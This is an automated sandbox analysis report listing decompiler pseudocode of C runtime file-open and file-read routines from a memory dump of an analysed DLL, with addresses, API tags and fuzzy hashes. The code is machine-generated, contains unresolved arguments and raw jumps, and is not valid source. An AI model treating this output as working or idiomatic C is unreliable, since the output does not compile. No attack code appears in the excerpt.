                          				signed char _t160;
                          				signed char _t161;
                          				void* _t185;
                          				void* _t186;
                          				signed int* _t207;
                          				intOrPtr* _t210;
                          				long long _t221;
                          				intOrPtr* _t229;
                          				signed long long _t237;
                          				intOrPtr _t251;
                          				signed long long _t252;
                          				signed long long _t272;
                          				signed long long _t273;
                          				signed int* _t278;
                          				void* _t281;
                          				void* _t282;
                          				signed int* _t284;
                          				void* _t285;
                          				void* _t293;
                          				void* _t295;
                          				void* _t300;
                          				void* _t303;
                          
                          				_t280 = __rsi;
                          				_t155 = __ebx;
                          				_t207 = _t284;
                          				_t207[2] = __rbx;
                          				_t207[4] = __rdi;
                          				_t207[6] = __r8;
                          				_t282 = _t207 - 0x47;
                          				_t285 = _t284 - 0xc0;
                          				r12d = r9d;
                          				r9d =  *(_t282 + 0x77);
                          				_t278 = __rdx;
                          				r8d =  *(_t282 + 0x6f);
                          				_t229 = __rcx;
                          				E00007FF87FF88C0820A8(r12d, __eflags, _t207, __rcx, _t282 - 1, _t282);
                          				asm("movups xmm0, [eax]");
                          				asm("movups xmm1, xmm0");
                          				asm("psrldq xmm1, 0x8");
                          				asm("dec cx");
                          				 *(_t282 - 0x11) = _t303 >> 0x20;
                          				asm("movups [ebp-0x59], xmm0");
                          				asm("movsd xmm0, [eax+0x10]");
                          				asm("movsd [ebp-0x31], xmm0");
                          				asm("movsd [ebp-0x49], xmm0");
                          				if (r15d != 0xffffffff) goto 0x8c0824c7;
                          				E00007FF87FF88C07E680(_t207);
                          				 *_t207 =  *_t207 & 0x00000000;
                          				 *__rdx =  *__rdx | 0xffffffff;
                          				E00007FF87FF88C07E6A0(_t207);
                          				goto 0x8c08280e;
                          				_t120 = E00007FF87FF88C083C80(r12d, _t185, _t207, _t229, _t282 - 1, __rdx, __rdx, __rsi);
                          				 *__rdx = _t120;
                          				if (_t120 != 0xffffffff) goto 0x8c0824eb;
                          				E00007FF87FF88C07E680(_t207);
                          				 *_t207 =  *_t207 & 0x00000000;
                          				 *__rdx =  *__rdx | 0xffffffff;
                          				E00007FF87FF88C07E6A0(_t207);
                          				 *_t207 = 0x18;
                          				goto 0x8c0824bb;
                          				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                          				r8d = r15d;
                          				 *(_t282 - 0x21) =  *(_t282 - 0x21) & 0x00000000;
                          				 *_t229 = 1;
                          				_t231 =  *(_t282 - 0x49) >> 0x20;
                          				_t156 = _t155 |  *(_t282 - 0x49);
                          				 *(_t285 + 0x28) = _t156;
                          				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                          				 *(_t282 - 0x29) = 0x18;
                          				 *(_t282 - 0x19) =  !(r12d >> 7) & 0x00000001;
                          				 *(_t282 - 0x39) =  *(_t282 - 0x49) >> 0x20;
                          				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                          				r14d =  *(_t282 - 0x55);
                          				 *(_t282 - 0x41) = _t207;
                          				if (_t207 != 0xffffffff) goto 0x8c0825df;
                          				if ((r14d & 0xc0000000) != 0xc0000000) goto 0x8c0825ac;
                          				if ((r12b & 0x00000001) == 0) goto 0x8c0825ac;
                          				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                          				asm("inc ecx");
                          				 *(_t282 - 0x55) = r14d;
                          				r8d = r15d;
                          				 *(_t285 + 0x28) = _t156;
                          				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                          				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                          				 *(_t282 - 0x41) = _t207;
                          				if (_t207 != 0xffffffff) goto 0x8c0825df;
                          				_t237 =  *__rdx;
                          				_t210 =  *((intOrPtr*)(0x8c0b4970 + (_t237 >> 6) * 8));
                          				 *(_t210 + (_t237 << 6) + 0x38) =  *(_t210 + (_t237 << 6) + 0x38) & 0x000000fe;
                          				E00007FF87FF88C07E630(GetLastError(), _t210,  *(_t282 - 0x49) >> 0x20);
                          				goto 0x8c0824bb;
                          				if (GetFileType(_t303) != 0) goto 0x8c08263d;
                          				_t134 = GetLastError();
                          				E00007FF87FF88C07E630(_t134, _t210,  *(_t282 - 0x49) >> 0x20);
                          				 *( *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) =  *( *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) & 0x000000fe;
                          				CloseHandle(_t300);
                          				if (_t134 != 0) goto 0x8c0824bb;
                          				_t137 = E00007FF87FF88C07E6A0(_t210);
                          				 *_t210 = 0xd;
                          				goto 0x8c0824bb;
                          				if (_t137 != 2) goto 0x8c08264a;
                          				goto 0x8c082652;
                          				if (_t137 != 3) goto 0x8c082652;
                          				_t160 =  *(_t282 - 0x59) | 0x48;
                          				E00007FF87FF88C083B9C(_t160,  *__rdx, _t186,  *(_t282 - 0x49) >> 0x20, _t207, __rdx, _t280, _t282, _t295, _t293);
                          				_t161 = _t160 | 0x00000001;
                          				 *(_t282 - 0x59) = _t161;
                          				 *( *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) = _t161;
                          				 *((char*)( *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x39)) = 0;
                          				if ((r12b & 0x00000002) == 0) goto 0x8c0826b4;
                          				_t139 = E00007FF87FF88C0822B4(_t161,  *__rdx, r12d & 0x0000003f,  *(_t282 - 0x49) >> 0x20, _t280);
                          				r13d = _t139;
                          				if (_t139 != 0) goto 0x8c0826e3;
                          				asm("movups xmm0, [ebp-0x59]");
                          				asm("movsd xmm1, [ebp-0x31]");
                          				r8d = r12d;
                          				asm("movaps [ebp-0x1], xmm0");
                          				 *((char*)(_t282 - 0x61)) = 0;
                          				asm("movsd [ebp+0xf], xmm1");
                          				_t140 = E00007FF87FF88C081E14( *_t278,  *(_t282 - 0x49) >> 0x20, _t282 - 1, _t280, _t282 - 0x61);
                          				if (_t140 == 0) goto 0x8c0826f2;
                          				r13d = _t140;
                          				E00007FF87FF88C085278( *_t278, r12d & 0x0000003f, _t185, _t140,  *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)),  *(_t282 - 0x49) >> 0x20, _t280);
                          				goto 0x8c08280e;
                          				 *((char*)( *((intOrPtr*)(0x8c0b4970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x39)) =  *((intOrPtr*)(_t282 - 0x61));
                          				_t272 =  *_t278;
                          				_t273 = _t272 << 6;
                          				_t251 =  *((intOrPtr*)(0x8c0b4970 + (_t272 >> 6) * 8));
                          				 *(_t251 + _t273 + 0x3d) =  *(_t251 + _t273 + 0x3d) & 0x000000fe;
                          				 *(_t251 + _t273 + 0x3d) =  *(_t251 + _t273 + 0x3d) | r12d >> 0x00000010 & 0x00000001;
                          				if ((_t161 & 0x00000048) != 0) goto 0x8c082759;
                          				if ((r12b & 0x00000008) == 0) goto 0x8c082759;
                          				_t252 =  *_t278;
                          				_t221 =  *((intOrPtr*)(0x8c0b4970 + (_t252 >> 6) * 8));
                          				 *(_t221 + (_t252 << 6) + 0x38) =  *(_t221 + (_t252 << 6) + 0x38) | 0x00000020;
                          				if ((r14d & 0xc0000000) != 0xc0000000) goto 0x8c08280c;
                          				if ((r12b & 0x00000001) == 0) goto 0x8c08280c;
                          				CloseHandle(_t281);
                          				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                          				asm("inc ecx");
                          				r8d =  *(_t282 - 0x11);
                          				 *(_t285 + 0x28) = 0xc0000000;
                          				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                          				 *(_t282 - 0x55) = r14d;
                          				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                          				if (_t221 != 0xffffffff) goto 0x8c0827f2;
                          				E00007FF87FF88C07E630(GetLastError(), _t221,  *(_t282 - 0x49) >> 0x20);
                          				 *( *((intOrPtr*)(0x8c0b4970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x38) =  *( *((intOrPtr*)(0x8c0b4970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x38) & 0x000000fe;
                          				E00007FF87FF88C083DB0(_t161,  *_t278, _t185, _t231, _t278, _t280);
                          				goto 0x8c0824bb;
                          				 *((long long*)( *((intOrPtr*)(0x8c0b4970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x28)) = _t221;
                          				return 0;
                          			}

































                          0x7ff88c08243c
                          0x7ff88c08243c
                          0x7ff88c08243c
                          0x7ff88c08243f
                          0x7ff88c082443
                          0x7ff88c082447
                          0x7ff88c082454
                          0x7ff88c082458
                          0x7ff88c08245f
                          0x7ff88c082465
                          0x7ff88c082469
                          0x7ff88c08246c
                          0x7ff88c082470
                          0x7ff88c08247a
                          0x7ff88c08247f
                          0x7ff88c082482
                          0x7ff88c082485
                          0x7ff88c08248a
                          0x7ff88c082493
                          0x7ff88c082497
                          0x7ff88c08249b
                          0x7ff88c0824a0
                          0x7ff88c0824a5
                          0x7ff88c0824ae
                          0x7ff88c0824b0
                          0x7ff88c0824b5
                          0x7ff88c0824b8
                          0x7ff88c0824bb
                          0x7ff88c0824c2
                          0x7ff88c0824c7
                          0x7ff88c0824cc
                          0x7ff88c0824d1
                          0x7ff88c0824d3
                          0x7ff88c0824d8
                          0x7ff88c0824db
                          0x7ff88c0824de
                          0x7ff88c0824e3
                          0x7ff88c0824e9
                          0x7ff88c0824eb
                          0x7ff88c0824ff
                          0x7ff88c082502
                          0x7ff88c082507
                          0x7ff88c082514
                          0x7ff88c08251a
                          0x7ff88c082520
                          0x7ff88c082524
                          0x7ff88c08252f
                          0x7ff88c082536
                          0x7ff88c082539
                          0x7ff88c08253d
                          0x7ff88c082543
                          0x7ff88c08254c
                          0x7ff88c082557
                          0x7ff88c082564
                          0x7ff88c08256a
                          0x7ff88c08256c
                          0x7ff88c082579
                          0x7ff88c08257e
                          0x7ff88c082582
                          0x7ff88c082589
                          0x7ff88c08258d
                          0x7ff88c082599
                          0x7ff88c08259f
                          0x7ff88c0825aa
                          0x7ff88c0825ac
                          0x7ff88c0825c4
                          0x7ff88c0825c8
                          0x7ff88c0825d5
                          0x7ff88c0825da
                          0x7ff88c0825ea
                          0x7ff88c0825ec
                          0x7ff88c0825f6
                          0x7ff88c082617
                          0x7ff88c08261f
                          0x7ff88c082627
                          0x7ff88c08262d
                          0x7ff88c082632
                          0x7ff88c082638
                          0x7ff88c082643
                          0x7ff88c082648
                          0x7ff88c08264d
                          0x7ff88c08264f
                          0x7ff88c082657
                          0x7ff88c082669
                          0x7ff88c082677
                          0x7ff88c08267e
                          0x7ff88c082697
                          0x7ff88c0826a0
                          0x7ff88c0826a4
                          0x7ff88c0826a9
                          0x7ff88c0826ae
                          0x7ff88c0826b4
                          0x7ff88c0826be
                          0x7ff88c0826c7
                          0x7ff88c0826ca
                          0x7ff88c0826ce
                          0x7ff88c0826d2
                          0x7ff88c0826d7
                          0x7ff88c0826de
                          0x7ff88c0826e0
                          0x7ff88c0826e5
                          0x7ff88c0826ed
                          0x7ff88c08270a
                          0x7ff88c08270e
                          0x7ff88c08271b
                          0x7ff88c08271f
                          0x7ff88c08272b
                          0x7ff88c082730
                          0x7ff88c082737
                          0x7ff88c08273d
                          0x7ff88c08273f
                          0x7ff88c082750
                          0x7ff88c082754
                          0x7ff88c082765
                          0x7ff88c08276f
                          0x7ff88c082778
                          0x7ff88c082786
                          0x7ff88c08278c
                          0x7ff88c082791
                          0x7ff88c082795
                          0x7ff88c08279c
                          0x7ff88c0827a4
                          0x7ff88c0827b0
                          0x7ff88c0827bd
                          0x7ff88c0827c7
                          0x7ff88c0827e1
                          0x7ff88c0827e8
                          0x7ff88c0827ed
                          0x7ff88c082807
                          0x7ff88c08282a

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                          • String ID:
                          • API String ID: 1330151763-0
                          • Opcode ID: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                          • Instruction ID: 8e2e99f6d23fc0251e32e76318ce310d972d86bf3edba8c9ce71367ddf844974
                          • Opcode Fuzzy Hash: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                          • Instruction Fuzzy Hash: 8DC1AE32B25A418AEF648F65D8513AC37A1FB4ABE8F015235DE2E5B799CF38D415C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E00007FF87FF88C085864(void* __ebx, signed int __ecx, void* __edx, void* __ebp, signed int* __rax, long long __rbx, long long __rdx, long long __r8) {
                          				void* _t118;
                          				unsigned int _t135;
                          				void* _t139;
                          				void* _t142;
                          				char _t154;
                          				char _t155;
                          				char _t156;
                          				void* _t181;
                          				long long _t186;
                          				long long _t220;
                          				intOrPtr _t221;
                          				signed short* _t235;
                          				signed int* _t238;
                          				char* _t241;
                          				signed short* _t250;
                          				signed long long _t255;
                          				signed long long _t256;
                          				signed long long _t261;
                          				DWORD* _t263;
                          				signed short* _t264;
                          				void* _t270;
                          				void* _t272;
                          				signed long long _t274;
                          				void* _t276;
                          				void* _t277;
                          				long long _t279;
                          				signed short* _t281;
                          				signed short* _t288;
                          				long _t292;
                          				void* _t294;
                          				void* _t297;
                          				void* _t299;
                          				char* _t301;
                          				char* _t302;
                          				char* _t303;
                          
                          				_t279 = __r8;
                          				 *((long long*)(_t276 + 0x18)) = __rbx;
                          				 *((long long*)(_t276 + 0x10)) = __rdx;
                          				_t277 = _t276 - 0x60;
                          				r12d = r8d;
                          				if (r13d != 0xfffffffe) goto 0x8c0858a5;
                          				E00007FF87FF88C07E680(__rax);
                          				 *__rax = 0;
                          				E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 9;
                          				goto 0x8c085cae;
                          				if (__ecx < 0) goto 0x8c085c97;
                          				_t181 = r13d -  *0x8c0b4d70; // 0x40
                          				if (_t181 >= 0) goto 0x8c085c97;
                          				_t3 = _t270 + 1; // 0x1
                          				r8d = _t3;
                          				 *((long long*)(_t277 + 0x48)) = __r8;
                          				_t274 = __ecx << 6;
                          				_t255 = __ecx >> 6;
                          				 *(_t277 + 0x40) = _t255;
                          				_t220 =  *((intOrPtr*)(0x8c0b4970 + _t255 * 8));
                          				if (( *(_t220 + _t274 + 0x38) & r8b) == 0) goto 0x8c085c97;
                          				if (r12d - 0x7fffffff <= 0) goto 0x8c085911;
                          				E00007FF87FF88C07E680(_t220);
                          				 *_t220 = 0;
                          				E00007FF87FF88C07E6A0(_t220);
                          				 *_t220 = 0x16;
                          				goto 0x8c085ca9;
                          				if (r12d == 0) goto 0x8c085c93;
                          				if (( *(_t220 + _t274 + 0x38) & 0x00000002) != 0) goto 0x8c085c93;
                          				_t186 = __rdx;
                          				if (_t186 == 0) goto 0x8c0858fa;
                          				r10d =  *((char*)(_t220 + _t274 + 0x39));
                          				 *((long long*)(_t277 + 0x38)) =  *((intOrPtr*)(_t220 + _t274 + 0x28));
                          				 *((intOrPtr*)(_t277 + 0xa0)) = r10b;
                          				if (_t186 == 0) goto 0x8c08596c;
                          				if (_t186 != 0) goto 0x8c085961;
                          				if ((r8b &  !r12d) == 0) goto 0x8c085976;
                          				r14d = r12d;
                          				goto 0x8c085a0c;
                          				if ((r8b &  !r12d) != 0) goto 0x8c085992;
                          				E00007FF87FF88C07E680(_t220);
                          				 *_t220 = 0;
                          				_t118 = E00007FF87FF88C07E6A0(_t220);
                          				 *_t220 = 0x16;
                          				E00007FF87FF88C07E580(_t118);
                          				goto 0x8c085b18;
                          				r14d = r12d;
                          				r14d = r14d >> 1;
                          				r14d =  <  ? 4 : r14d;
                          				E00007FF87FF88C07E154(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                          				_t241 = _t220;
                          				E00007FF87FF88C07E114(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                          				E00007FF87FF88C07E114(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                          				_t301 = _t241;
                          				if (_t241 != 0) goto 0x8c0859db;
                          				E00007FF87FF88C07E6A0(_t220);
                          				 *_t220 = 0xc;
                          				E00007FF87FF88C07E680(_t220);
                          				 *_t220 = 8;
                          				goto 0x8c085b18;
                          				_t26 = _t255 + 1; // 0x1
                          				r8d = _t26;
                          				E00007FF87FF88C085D68(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)), _t255);
                          				_t256 =  *(_t277 + 0x40);
                          				r10b =  *((intOrPtr*)(_t277 + 0xa0));
                          				r8d = 1;
                          				 *((long long*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x30)) = _t220;
                          				_t221 =  *((intOrPtr*)(0x8c0b4970 + _t256 * 8));
                          				 *((long long*)(_t277 + 0x50)) = _t301;
                          				r9d = 0xa;
                          				if (( *(_t221 + _t274 + 0x38) & 0x00000048) == 0) goto 0x8c085aa1;
                          				_t154 =  *((intOrPtr*)(_t221 + _t274 + 0x3a));
                          				if (_t154 == r9b) goto 0x8c085aa1;
                          				if (r14d == 0) goto 0x8c085aa1;
                          				 *_t301 = _t154;
                          				r14d = r14d - 1;
                          				_t302 = _t301 + _t279;
                          				 *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3a)) = r9b;
                          				if (r10b == 0) goto 0x8c085aa1;
                          				_t155 =  *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3b));
                          				if (_t155 == r9b) goto 0x8c085aa1;
                          				if (r14d == 0) goto 0x8c085aa1;
                          				 *_t302 = _t155;
                          				_t303 = _t302 + _t279;
                          				r14d = r14d - 1;
                          				 *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3b)) = r9b;
                          				if (r10b != r8b) goto 0x8c085aa1;
                          				_t156 =  *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3c));
                          				if (_t156 == r9b) goto 0x8c085aa1;
                          				if (r14d == 0) goto 0x8c085aa1;
                          				 *_t303 = _t156;
                          				r14d = r14d - 1;
                          				 *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3c)) = r9b;
                          				if (E00007FF87FF88C083EE4(r13d, 0,  *((intOrPtr*)(0x8c0b4970 + _t256 * 8))) == 0) goto 0x8c085b36;
                          				_t228 =  *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8));
                          				if (( *( *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8)) + _t274 + 0x38) & 0x00000080) == 0) goto 0x8c085b36;
                          				if (GetConsoleMode(_t299) == 0) goto 0x8c085b36;
                          				if ( *((char*)(_t277 + 0xa0)) != 2) goto 0x8c085b3b;
                          				r14d = r14d >> 1;
                          				r8d = r14d;
                          				 *(_t277 + 0x20) = _t270;
                          				if (ReadConsoleW(_t297, _t294, _t292, _t263, _t270) != 0) goto 0x8c085b2a;
                          				E00007FF87FF88C07E630(GetLastError(),  *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8)), _t241);
                          				E00007FF87FF88C07E114( *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8)), _t241);
                          				goto 0x8c085cb1;
                          				goto 0x8c085b76;
                          				 *((intOrPtr*)(_t277 + 0x48)) = sil;
                          				r8d = r14d;
                          				 *(_t277 + 0x20) = _t270;
                          				if (ReadFile(_t272, ??, ??, ??) == 0) goto 0x8c085c5d;
                          				if ( *((intOrPtr*)(_t277 + 0xb8)) - r12d > 0) goto 0x8c085c5d;
                          				if (( *( *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8)) + _t274 + 0x38) & 0x00000080) == 0) goto 0x8c085b1b;
                          				if ( *((char*)(_t277 + 0xa0)) == 2) goto 0x8c085bbf;
                          				_t261 = _t303 + _t279;
                          				 *(_t277 + 0x20) = _t292 >> 1;
                          				_t135 = E00007FF87FF88C085564(__ebx, r13d, _t263 + _t228 * 2 +  *((intOrPtr*)(_t277 + 0xb8)), _t261, _t263 + _t228 * 2 +  *((intOrPtr*)(_t277 + 0xb8)),  *((intOrPtr*)(_t277 + 0xa8)));
                          				goto 0x8c085b1b;
                          				if (_t135 == 0) goto 0x8c085c45;
                          				_t281 =  *((intOrPtr*)(_t277 + 0x50));
                          				_t250 = _t281;
                          				_t264 = _t281;
                          				_t288 =  &(_t281[_t135 >> 1]);
                          				if (_t281 - _t288 >= 0) goto 0x8c085c38;
                          				_t235 =  &(_t281[1]);
                          				r9d =  *_t250 & 0x0000ffff;
                          				if (r9w == 0x1a) goto 0x8c085c2f;
                          				if (r9w != 0xd) goto 0x8c085c18;
                          				if (_t235 - _t288 >= 0) goto 0x8c085c18;
                          				if ( *_t235 != 0xa) goto 0x8c085c18;
                          				 *_t264 = 0xa;
                          				goto 0x8c085c28;
                          				_t264[1] = r9w;
                          				if ( &(_t250[3]) - _t288 < 0) goto 0x8c085beb;
                          				goto 0x8c085c38;
                          				_t238 =  *((intOrPtr*)(0x8c0b4970 + _t261 * 8));
                          				 *(_t238 + _t274 + 0x38) =  *(_t238 + _t274 + 0x38) | 0x00000002;
                          				goto 0x8c085b1b;
                          				E00007FF87FF88C085334(r13d, _t135 + _t135,  *((intOrPtr*)(_t277 + 0x50)), _t135 + _t135 >> 1);
                          				goto 0x8c085bb8;
                          				if (GetLastError() != 5) goto 0x8c085c83;
                          				E00007FF87FF88C07E6A0(_t238);
                          				 *_t238 = 9;
                          				_t139 = E00007FF87FF88C07E680(_t238);
                          				 *_t238 = 5;
                          				goto 0x8c085b18;
                          				if (_t139 != 0x6d) goto 0x8c085b11;
                          				goto 0x8c085b1b;
                          				goto 0x8c085cb1;
                          				E00007FF87FF88C07E680(_t238);
                          				 *_t238 = 0xa;
                          				_t142 = E00007FF87FF88C07E6A0(_t238);
                          				 *_t238 = 9;
                          				return E00007FF87FF88C07E580(_t142) | 0xffffffff;
                          			}






































                          0x7ff88c085864
                          0x7ff88c085864
                          0x7ff88c085869
                          0x7ff88c085879
                          0x7ff88c085883
                          0x7ff88c08588a
                          0x7ff88c08588c
                          0x7ff88c085893
                          0x7ff88c085895
                          0x7ff88c08589a
                          0x7ff88c0858a0
                          0x7ff88c0858a9
                          0x7ff88c0858af
                          0x7ff88c0858b6
                          0x7ff88c0858bf
                          0x7ff88c0858bf
                          0x7ff88c0858c6
                          0x7ff88c0858ce
                          0x7ff88c0858d2
                          0x7ff88c0858dd
                          0x7ff88c0858e2
                          0x7ff88c0858eb
                          0x7ff88c0858f8
                          0x7ff88c0858fa
                          0x7ff88c0858ff
                          0x7ff88c085901
                          0x7ff88c085906
                          0x7ff88c08590c
                          0x7ff88c085914
                          0x7ff88c08591f
                          0x7ff88c085925
                          0x7ff88c085928
                          0x7ff88c085932
                          0x7ff88c08593d
                          0x7ff88c085945
                          0x7ff88c085950
                          0x7ff88c085955
                          0x7ff88c08595f
                          0x7ff88c085961
                          0x7ff88c085967
                          0x7ff88c085974
                          0x7ff88c085976
                          0x7ff88c08597b
                          0x7ff88c08597d
                          0x7ff88c085982
                          0x7ff88c085988
                          0x7ff88c08598d
                          0x7ff88c085992
                          0x7ff88c085995
                          0x7ff88c08599b
                          0x7ff88c0859a2
                          0x7ff88c0859a9
                          0x7ff88c0859ac
                          0x7ff88c0859b3
                          0x7ff88c0859b8
                          0x7ff88c0859be
                          0x7ff88c0859c0
                          0x7ff88c0859c5
                          0x7ff88c0859cb
                          0x7ff88c0859d0
                          0x7ff88c0859d6
                          0x7ff88c0859e0
                          0x7ff88c0859e0
                          0x7ff88c0859e4
                          0x7ff88c0859e9
                          0x7ff88c0859f5
                          0x7ff88c0859fd
                          0x7ff88c085a07
                          0x7ff88c085a0c
                          0x7ff88c085a12
                          0x7ff88c085a17
                          0x7ff88c085a22
                          0x7ff88c085a24
                          0x7ff88c085a2b
                          0x7ff88c085a30
                          0x7ff88c085a32
                          0x7ff88c085a35
                          0x7ff88c085a3c
                          0x7ff88c085a42
                          0x7ff88c085a4a
                          0x7ff88c085a50
                          0x7ff88c085a57
                          0x7ff88c085a5c
                          0x7ff88c085a5e
                          0x7ff88c085a69
                          0x7ff88c085a6c
                          0x7ff88c085a6f
                          0x7ff88c085a77
                          0x7ff88c085a7d
                          0x7ff88c085a84
                          0x7ff88c085a89
                          0x7ff88c085a8b
                          0x7ff88c085a99
                          0x7ff88c085a9c
                          0x7ff88c085aab
                          0x7ff88c085abd
                          0x7ff88c085ac6
                          0x7ff88c085ada
                          0x7ff88c085ae4
                          0x7ff88c085af3
                          0x7ff88c085af9
                          0x7ff88c085afc
                          0x7ff88c085b09
                          0x7ff88c085b13
                          0x7ff88c085b1e
                          0x7ff88c085b25
                          0x7ff88c085b34
                          0x7ff88c085b36
                          0x7ff88c085b48
                          0x7ff88c085b4b
                          0x7ff88c085b5b
                          0x7ff88c085b69
                          0x7ff88c085b8b
                          0x7ff88c085b95
                          0x7ff88c085ba5
                          0x7ff88c085bae
                          0x7ff88c085bb3
                          0x7ff88c085bba
                          0x7ff88c085bc6
                          0x7ff88c085bc8
                          0x7ff88c085bd0
                          0x7ff88c085bd6
                          0x7ff88c085bd9
                          0x7ff88c085be0
                          0x7ff88c085be2
                          0x7ff88c085beb
                          0x7ff88c085bf4
                          0x7ff88c085bfb
                          0x7ff88c085c00
                          0x7ff88c085c05
                          0x7ff88c085c0b
                          0x7ff88c085c16
                          0x7ff88c085c18
                          0x7ff88c085c2b
                          0x7ff88c085c2d
                          0x7ff88c085c2f
                          0x7ff88c085c33
                          0x7ff88c085c40
                          0x7ff88c085c53
                          0x7ff88c085c58
                          0x7ff88c085c66
                          0x7ff88c085c68
                          0x7ff88c085c6d
                          0x7ff88c085c73
                          0x7ff88c085c78
                          0x7ff88c085c7e
                          0x7ff88c085c86
                          0x7ff88c085c8e
                          0x7ff88c085c95
                          0x7ff88c085c97
                          0x7ff88c085c9c
                          0x7ff88c085c9e
                          0x7ff88c085ca3
                          0x7ff88c085cc8

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 9572a25240cbba2ebec1dfc6c115ffcd4b7ea8cb82a20bbf97e2d75b67ba7c1d
                          • Instruction ID: 1be1cf0e1b2bd76c995eb95add0aaf68eef64bf10bebb37d9e6714b23caf34cd
                          • Opcode Fuzzy Hash: 9572a25240cbba2ebec1dfc6c115ffcd4b7ea8cb82a20bbf97e2d75b67ba7c1d
                          • Instruction Fuzzy Hash: 12C1E422A1C68286FE759F22D84027D6BD5FB92BC4F558135EA8E07399CF3CE841CB01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 17%
                          			E0000027E27ED3711BFC(long long* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, intOrPtr _a8, long long _a16, long long _a24, long long _a40, long long _a48) {
                          				long long _v72;
                          				char _v80;
                          				char _v88;
                          				long long _v96;
                          				char _v104;
                          				signed int _v112;
                          				long long _v120;
                          				long long _v128;
                          				intOrPtr _v136;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				signed int _t65;
                          				intOrPtr _t93;
                          				intOrPtr _t94;
                          				long long* _t148;
                          				long long* _t152;
                          				long long* _t155;
                          				long long* _t157;
                          				intOrPtr* _t188;
                          				intOrPtr _t189;
                          				long long _t192;
                          				long long* _t193;
                          				void* _t203;
                          				intOrPtr _t213;
                          				long long _t214;
                          
                          				_t157 = __rbx;
                          				_t148 = __rax;
                          				_a24 = __rbx;
                          				_a16 = __rdx;
